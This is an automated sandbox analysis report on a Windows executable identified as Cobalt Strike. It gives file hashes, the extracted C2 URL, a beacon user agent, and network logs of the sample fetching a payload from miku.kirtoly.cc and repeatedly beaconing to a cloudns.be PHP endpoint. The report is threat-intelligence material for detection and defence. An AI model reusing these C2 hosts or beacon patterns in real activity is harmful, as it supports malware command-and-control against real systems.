Analysis

  • max time kernel
    142s
  • max time network
    141s
  • platform
    windows7_x64
  • resource
    win7-20240611-en
  • resource tags
    arch:x64, arch:x86, image:win7-20240611-en, locale:en-us, os:windows7-x64, system
  • submitted
    16/06/2024, 07:09 UTC

General

  • Target

    df6eff95999e5095f1a6a243a57ca600_NeikiAnalytics.exe

  • Size

    19KB

  • MD5

    df6eff95999e5095f1a6a243a57ca600

  • SHA1

    3904f817c5ddb9d13efde0e711204d659b9d9151

  • SHA256

    8591414faeeaf0c711df8c5bc16b63dbe5012424582de92ffc8183630ff877e6

  • SHA512

    ad01a17c1c201294361cef2418944209f9b668b9d34af21f566aaf1199e988505417384e25c4ab189c54e63ab42e8037a196467bcaceb1913da0ba4bf51019f3

  • SSDEEP

    192:OV7qaCF6Op1t2dobVXujRDcBaXWQjwOT/22VWF8qa1Dojjgi:YqaCF31cix+Dc4zjUFF46gi

Malware Config

Extracted

Family

cobaltstrike

C2

http://miku.kirtoly.cc:443/Zc4l

Attributes
  • user_agent

    User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 5.2) Java/1.5.0_08 Host: miku.kirtoly.cc

Signatures

Processes

  • C:\Users\Admin\AppData\Local\Temp\df6eff95999e5095f1a6a243a57ca600_NeikiAnalytics.exe
    "C:\Users\Admin\AppData\Local\Temp\df6eff95999e5095f1a6a243a57ca600_NeikiAnalytics.exe"
    PID: 2080

    Network

    • DNS (remote address in US)
      miku.kirtoly.cc
      df6eff95999e5095f1a6a243a57ca600_NeikiAnalytics.exe
      Remote address:
      8.8.8.8:53
      Request
      miku.kirtoly.cc
      IN A
      Response
      miku.kirtoly.cc
      IN CNAME
      www.shopify.com
      www.shopify.com
      IN A
      185.146.173.20
    • GET (remote address in CA)
      https://miku.kirtoly.cc/Zc4l
      df6eff95999e5095f1a6a243a57ca600_NeikiAnalytics.exe
      Remote address:
      185.146.173.20:443
      Request
      GET /Zc4l HTTP/1.1
      User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 5.2) Java/1.5.0_08
      Host: miku.kirtoly.cc
      Connection: Keep-Alive
      Cache-Control: no-cache
      Response
      HTTP/1.1 200 OK
      Date: Sun, 16 Jun 2024 07:09:52 GMT
      Content-Type: application/octet-stream
      Content-Length: 296007
      Connection: keep-alive
      CF-Cache-Status: DYNAMIC
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QreGKU0%2BeL7jt3ZcvQmkhbqV0iCMeyl%2BkmlZP0OVK4g1532uGsaYfCa%2Fl%2B6jq1mj8ULtsoMzFkZuArrAWsajS5fQZNJgJSV9Vs3%2BgfZy3UTZ6c9vGalzbxk3Fzuq%2FvANarE%3D"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 8948fa082c146389-LHR
      alt-svc: h3=":443"; ma=86400
    • DNS (remote address in US)
      cs.m1ku.cloudns.be
      df6eff95999e5095f1a6a243a57ca600_NeikiAnalytics.exe
      Remote address:
      8.8.8.8:53
      Request
      cs.m1ku.cloudns.be
      IN A
      Response
      cs.m1ku.cloudns.be
      IN A
      185.146.173.20
    • GET (remote address in CA)
      https://cs.m1ku.cloudns.be/include/template/isx.php
      df6eff95999e5095f1a6a243a57ca600_NeikiAnalytics.exe
      Remote address:
      185.146.173.20:443
      Request
      GET /include/template/isx.php HTTP/1.1
      Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
      Referer: http://www.google.com
      Accept-Language: en-us,en;q=0.5
      Cookie: IBpTAuXWuiM3Tulbikz56XWUhZNYY2tKhX82RIioBx/eDVrKdxywWQt9febvgAWk5xQIa+rKO4Dchxb5wCWBPSutWZZlmxrgB/VnhOTHTOYazWah6Bn9x/F5/dGHmJ7XEm+I7Cs9cF5uLxhuCSxtRNaWxh2xsQdabGImADr7ij0=
      Host: cs.m1ku.cloudns.be
      User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 5.2) Java/1.5.0_08
      Connection: Keep-Alive
      Cache-Control: no-cache
      Response
      HTTP/1.1 200 OK
      Date: Sun, 16 Jun 2024 07:09:55 GMT
      Content-Type: text/html
      Transfer-Encoding: chunked
      Connection: keep-alive
      X-Powered-By: PHP/5.3.28
      Cache-Control: no-cache
      CF-Cache-Status: DYNAMIC
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=W2dOiQqa%2BSfevycEKlkYwoq%2B3F627ERMHbB8oPC0GllpK%2BGDyHHuMbznwTxbW8aFpcz%2BWEQubLH6%2Ffc3Zq%2BOwSEfh1DPZFNooyKkxjXMtfmJBdRi88g9A8SDNSgXHNoJgJIKr9s%3D"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 8948fa1c9987408a-LHR
      alt-svc: h3=":443"; ma=86400
    • GET (remote address in CA)
      https://cs.m1ku.cloudns.be/include/template/isx.php
      df6eff95999e5095f1a6a243a57ca600_NeikiAnalytics.exe
      Remote address:
      185.146.173.20:443
      Request
      GET /include/template/isx.php HTTP/1.1
      Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
      Referer: http://www.google.com
      Accept-Language: en-us,en;q=0.5
      Cookie: IBpTAuXWuiM3Tulbikz56XWUhZNYY2tKhX82RIioBx/eDVrKdxywWQt9febvgAWk5xQIa+rKO4Dchxb5wCWBPSutWZZlmxrgB/VnhOTHTOYazWah6Bn9x/F5/dGHmJ7XEm+I7Cs9cF5uLxhuCSxtRNaWxh2xsQdabGImADr7ij0=
      Host: cs.m1ku.cloudns.be
      User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 5.2) Java/1.5.0_08
      Connection: Keep-Alive
      Cache-Control: no-cache
      Response
      HTTP/1.1 200 OK
      Date: Sun, 16 Jun 2024 07:10:27 GMT
      Content-Type: text/html
      Transfer-Encoding: chunked
      Connection: keep-alive
      X-Powered-By: PHP/5.3.28
      Cache-Control: no-cache
      CF-Cache-Status: DYNAMIC
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=deqWUfbPpVksai%2F%2BAJmSRWKNtwAOjefIQpjXPJKrwQIoY%2ByPEG9T7T5pu8Mj%2BPyipnTJkym2lTU71xqqYNbwgsdE%2F0g%2FEN9kMzmJE83VUqDh%2BqgUwd4rhzBsEp0wRdtXg9EChOQ%3D"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 8948fae1dfe994a3-LHR
      alt-svc: h3=":443"; ma=86400
    • GET (remote address in CA)
      https://cs.m1ku.cloudns.be/include/template/isx.php
      df6eff95999e5095f1a6a243a57ca600_NeikiAnalytics.exe
      Remote address:
      185.146.173.20:443
      Request
      GET /include/template/isx.php HTTP/1.1
      Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
      Referer: http://www.google.com
      Accept-Language: en-us,en;q=0.5
      Cookie: IBpTAuXWuiM3Tulbikz56XWUhZNYY2tKhX82RIioBx/eDVrKdxywWQt9febvgAWk5xQIa+rKO4Dchxb5wCWBPSutWZZlmxrgB/VnhOTHTOYazWah6Bn9x/F5/dGHmJ7XEm+I7Cs9cF5uLxhuCSxtRNaWxh2xsQdabGImADr7ij0=
      Host: cs.m1ku.cloudns.be
      User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 5.2) Java/1.5.0_08
      Connection: Keep-Alive
      Cache-Control: no-cache
      Response
      HTTP/1.1 200 OK
      Date: Sun, 16 Jun 2024 07:10:58 GMT
      Content-Type: text/html
      Transfer-Encoding: chunked
      Connection: keep-alive
      X-Powered-By: PHP/5.3.28
      Cache-Control: no-cache
      CF-Cache-Status: DYNAMIC
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0tREyb7jMSysc8l5MM9DOgPLrwOaAuC%2F68AX28bdR3q9yAxlqsm%2Bcnf%2BguPc7Bouq1BWTVS2Ewio%2FcD%2BVvD%2FX%2FpFOXpcHfghlcS8bZobAuHatXu%2FWOuQU89hTO99YlMa4dN0Zaw%3D"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 8948fba80ade35dd-LHR
      alt-svc: h3=":443"; ma=86400
    • GET (remote address in CA)
      https://cs.m1ku.cloudns.be/include/template/isx.php
      df6eff95999e5095f1a6a243a57ca600_NeikiAnalytics.exe
      Remote address:
      185.146.173.20:443
      Request
      GET /include/template/isx.php HTTP/1.1
      Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
      Referer: http://www.google.com
      Accept-Language: en-us,en;q=0.5
      Cookie: IBpTAuXWuiM3Tulbikz56XWUhZNYY2tKhX82RIioBx/eDVrKdxywWQt9febvgAWk5xQIa+rKO4Dchxb5wCWBPSutWZZlmxrgB/VnhOTHTOYazWah6Bn9x/F5/dGHmJ7XEm+I7Cs9cF5uLxhuCSxtRNaWxh2xsQdabGImADr7ij0=
      Host: cs.m1ku.cloudns.be
      User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 5.2) Java/1.5.0_08
      Connection: Keep-Alive
      Cache-Control: no-cache
      Response
      HTTP/1.1 200 OK
      Date: Sun, 16 Jun 2024 07:11:30 GMT
      Content-Type: text/html
      Transfer-Encoding: chunked
      Connection: keep-alive
      X-Powered-By: PHP/5.3.28
      Cache-Control: no-cache
      CF-Cache-Status: DYNAMIC
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wKS8X8qzrYDuQtIs2aS8l9GWUYCDetK1Eh7VWjjA6eiDf5HqOT4fbycv%2B%2BqwmeycdqbKrpZSlXRVe3fvPoOR2QrdVZGSP55istWumWhuCPOBH%2FiJJqrRL8DcsZjUAk6vTlnYl8w%3D"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 8948fc6dac564133-LHR
      alt-svc: h3=":443"; ma=86400
    • GET (remote address in CA)
      https://cs.m1ku.cloudns.be/include/template/isx.php
      df6eff95999e5095f1a6a243a57ca600_NeikiAnalytics.exe
      Remote address:
      185.146.173.20:443
      Request
      GET /include/template/isx.php HTTP/1.1
      Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
      Referer: http://www.google.com
      Accept-Language: en-us,en;q=0.5
      Cookie: IBpTAuXWuiM3Tulbikz56XWUhZNYY2tKhX82RIioBx/eDVrKdxywWQt9febvgAWk5xQIa+rKO4Dchxb5wCWBPSutWZZlmxrgB/VnhOTHTOYazWah6Bn9x/F5/dGHmJ7XEm+I7Cs9cF5uLxhuCSxtRNaWxh2xsQdabGImADr7ij0=
      Host: cs.m1ku.cloudns.be
      User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 5.2) Java/1.5.0_08
      Connection: Keep-Alive
      Cache-Control: no-cache
      Response
      HTTP/1.1 200 OK
      Date: Sun, 16 Jun 2024 07:12:02 GMT
      Content-Type: text/html
      Transfer-Encoding: chunked
      Connection: keep-alive
      X-Powered-By: PHP/5.3.28
      Cache-Control: no-cache
      CF-Cache-Status: DYNAMIC
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LamQGkJu4vMlPZUIWWDRyDZprBl2uMiQM7FWhwb6Z9bb7Ac9i%2FRZbScEk57YwAVT98EOt9k%2FwEHeW8s%2B02YUlRJniQax%2Bp9qhbB6%2BtmT1Dk6Wk9duX3PbhNbzMVRTFdrDvn5P4Y%3D"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 8948fd334a0377a8-LHR
      alt-svc: h3=":443"; ma=86400
    • 185.146.173.20:443 (tls, http)
      https://miku.kirtoly.cc/Zc4l
      df6eff95999e5095f1a6a243a57ca600_NeikiAnalytics.exe
      sent 6.8kB (136 packets), received 316.3kB (259 packets)

      HTTP Request

      GET https://miku.kirtoly.cc/Zc4l

      HTTP Response

      200
    • 185.146.173.20:443 (tls, http)
      https://cs.m1ku.cloudns.be/include/template/isx.php
      df6eff95999e5095f1a6a243a57ca600_NeikiAnalytics.exe
      sent 1.3kB (9 packets), received 4.4kB (10 packets)

      HTTP Request

      GET https://cs.m1ku.cloudns.be/include/template/isx.php

      HTTP Response

      200
    • 185.146.173.20:443 (tls, http)
      https://cs.m1ku.cloudns.be/include/template/isx.php
      df6eff95999e5095f1a6a243a57ca600_NeikiAnalytics.exe
      sent 1.3kB (9 packets), received 4.4kB (10 packets)

      HTTP Request

      GET https://cs.m1ku.cloudns.be/include/template/isx.php

      HTTP Response

      200
    • 185.146.173.20:443 (tls, http)
      https://cs.m1ku.cloudns.be/include/template/isx.php
      df6eff95999e5095f1a6a243a57ca600_NeikiAnalytics.exe
      sent 1.3kB (9 packets), received 4.4kB (10 packets)

      HTTP Request

      GET https://cs.m1ku.cloudns.be/include/template/isx.php

      HTTP Response

      200
    • 185.146.173.20:443 (tls, http)
      https://cs.m1ku.cloudns.be/include/template/isx.php
      df6eff95999e5095f1a6a243a57ca600_NeikiAnalytics.exe
      sent 1.1kB (6 packets), received 1.2kB (6 packets)

      HTTP Request

      GET https://cs.m1ku.cloudns.be/include/template/isx.php

      HTTP Response

      200
    • 185.146.173.20:443 (tls, http)
      https://cs.m1ku.cloudns.be/include/template/isx.php
      df6eff95999e5095f1a6a243a57ca600_NeikiAnalytics.exe
      sent 1.2kB (7 packets), received 4.4kB (9 packets)

      HTTP Request

      GET https://cs.m1ku.cloudns.be/include/template/isx.php

      HTTP Response

      200
    • 8.8.8.8:53 (dns)
      miku.kirtoly.cc
      df6eff95999e5095f1a6a243a57ca600_NeikiAnalytics.exe
      sent 61 B (1 packet), received 106 B (1 packet)

      DNS Request

      miku.kirtoly.cc

      DNS Response

      185.146.173.20

    • 8.8.8.8:53 (dns)
      cs.m1ku.cloudns.be
      df6eff95999e5095f1a6a243a57ca600_NeikiAnalytics.exe
      sent 64 B (1 packet), received 80 B (1 packet)

      DNS Request

      cs.m1ku.cloudns.be

      DNS Response

      185.146.173.20

    MITRE ATT&CK Matrix

    Downloads

    • memory/2080-0-0x0000000000020000-0x0000000000021000-memory.dmp

      Filesize

      4KB

    • memory/2080-1-0x0000000003E70000-0x0000000004270000-memory.dmp

      Filesize

      4.0MB

    • memory/2080-2-0x00000000033B0000-0x0000000003406000-memory.dmp

      Filesize

      344KB

    • memory/2080-3-0x0000000000400000-0x000000000040C000-memory.dmp

      Filesize

      48KB

    • memory/2080-5-0x00000000033B0000-0x0000000003406000-memory.dmp

      Filesize

      344KB
